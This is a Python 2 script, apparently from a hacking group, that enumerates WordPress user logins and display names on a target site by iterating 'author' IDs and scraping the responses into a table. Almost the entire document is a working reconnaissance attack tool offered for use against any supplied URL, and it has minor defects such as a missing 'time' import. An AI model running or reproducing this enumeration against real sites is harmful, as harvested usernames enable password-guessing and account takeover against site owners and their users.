enumerate_users_wordpress_2016.py

#!/usr/bin/env python
# CodeD By ./ChmoD
# Enumerate Users WordPress
# Ex: ./EXploit -s http://site.com.br -n 30
# *** Brazilians Hackers Team ***

import urllib2, urllib, sys, argparse

def banner():
    print ("""
           `,+@@@+                              
         .+@@@@@@@;                            
      `;@@@@@@@@@@@                            
     +@@@@@@@@@@@@@:                            
   ;@@@@@@@@@@@@@@@@                            
 `@@@@@@@@@@@@@@@@@@`                          
 `@@@@@@@@@@@@@@@@@@#                          
  .@@@@@@@@@@@@@@@@@@,                          
   :@@@@@@@@@@@@@@@@@@      .'@@                
    #@@@@@@@@@@@@@@@@+;  .+@@@@@                
    `@@@@@@@@@@@@@#;;+@+#@@@#:`                
     #@@@@@@@@@@';'@@@@@@@:`                    
     `@@@@@@@+;;+@@@@@##`                      
      .@@@#;;+@@@@@#+',.,'.                    
       +;;'#@@@@#+;`      ,:                    
       .#@@@@#++:  @.    ...`                  
    `'@@@@#++'. +  .#++;;+  +                  
  ,@@@@@#++:``::+   `',:+,. ,                  
`@@@@#, #+` ',.`'.   +` ``  `,  .+              
 @@:`  ,+. ,`:``.:   '. .',+++   #              
 ``    #+`++,.`:,``    :`+@@'@@@@'    ````      
       #'`#+:`.,`:` .@@@+@#  +`.      :  `:    
       #:: +.`,.., `@@,#@':. +        :   '    
       #: ` ',:`,, @#``    + +        ' `,;    
       #: ` `:''`  @` #:.. , '        #+++:    
       #: ,     ;#'#  + :   `:         #++      
       #; '     `''         ,          '.      
       ;' '                 #         `@#      *** Brazilians Hackers Team ***
        #.;                ;`       ,#.:;      
        `+;               '.        @   `            Cod3D By ./ChmoD
         :#;            `@:        :`  `,      
          .#+;        `'+.'        +               Skype: BrazilObscure
            .@++#'+@+@++` ;@.     '            
             `' ., ` #:`# `+.#+  :.            
              ., :  @#;.`;`:  `#@.              
               +``,.;`@+,. '#                  
               @' ' ;`@:+`#`;`                  
              `#+  ,'`#  :.  '                  
              ' #.  :`#` '`. +                  
              # +.  .:+: :`. .                  
             `, +,   ..+ '`   :                
             ;` #+@:,:#.;``   '                
             #'##:#+.  : `;   ;                
             #. #:      `'`   :                
                #,        `   . """)
    time.sleep(1)

def uniq(lst):
    last = object()
    for item in lst:
        if item == last:
            continue
        yield item
        last = item

def sort_and_deduplicate(l):
    return list(uniq(sorted(l, reverse=False)))

def curllib(req, params=None,postdata=None):
    headers = { 'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0',
                'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        req = urllib2.Request( req, postdata, headers)
        req = urllib2.urlopen(req, timeout = 30).read()
    except Exception as e:
        return False
    return req

def sout(s):
    sys.stdout.write( s + "\r" )
    sys.stdout.flush()

def finder( text, start, end, index = 1 ):
    try:
        text = text.split(start)[index]
        return text.split(end)[0]
    except:
        return ""

def find_username( html=None ):
    if html != None:
        return { "user": finder( html, '/author/', '/' ), "name": finder( html, '<title>', '</title>' ).split(',')[0] }


# Main:

parser = argparse.ArgumentParser(description="Wordpress Enumerate Users", epilog="\033[1mCoded by ChmoD \033[0m")

parser.add_argument( '-s', '--site', required=True, default=None, help='target domain or URL')
parser.add_argument( '-n', required=True, type=int, default=None , help='numbers of users to enumerate.')
args = vars(parser.parse_args())

results = []
max_login_len = max_name_len = 0
site = urllib2.urlparse.urlparse( args['site'] )
usern = args['n']

if site:
    site = site[0]+"://"+site[1]+"/" if site[2] == "" else site[0]+"://"+site[1]+site[2]
    print("[+]: Scanning "+site)
else:
    sys.exit("[#]: Wrong SITE formate (ex):\r\nhttp://target.com/")
for x in range( 0, usern ):
    sout("[+]: %" + str( 100 / usern*x ) + "\t")
    try:
        tmp = curllib(site, '', urllib.urlencode({"author":(x+1)}) )#vsend the request
        if tmp == False:
            pass
        tmp = find_username( tmp ) # extract the info from the respond
    except:
        pass
    if len(tmp['user']):
        results.append(tmp)
        max_login_len = len(tmp['user']) if max_login_len < len(tmp['user']) else max_login_len #get the longest username
        max_name_len = len(tmp['name']) if max_name_len < len(tmp['name']) else max_name_len #get the longest name

if not results:
    print("[ERROR]: Could not find anything, or something went wrong!")
    sys.exit()
results = sort_and_deduplicate(results)#remove duplicate
print("Found "+str( len( results ) )+" users in "+site+"")

login_space = (max_login_len-len("Login")+1)*" "
name_space = (max_name_len-len("Name")+1)*" "
login_bar = ((max_login_len-len("Login")+1)+6)*"-"
name_bar = ((max_name_len-len("Name")+1)+5)*"-"
header = "| Id | Login"+login_space+"| Name"+name_space+"|"

# print the head of the table
print("  +----+"+login_bar+"+"+name_bar+"+")
print("  "+header)
print("  +----+"+login_bar+"+"+name_bar+"+")

# print the
for x in range(0,len(results)):
    id_space = (3-len(str(x+1)))*" "
    login_space = (max_login_len-len(results[x]['user'])+1)*" "
    name_space = (max_name_len-len(results[x]['name'])+1)*" "
    print("  | "+str(x+1)+id_space+"| "+results[x]['user']+login_space+"| "+results[x]['name']+name_space+"|")
print("  +----+"+login_bar+"+"+name_bar+"+")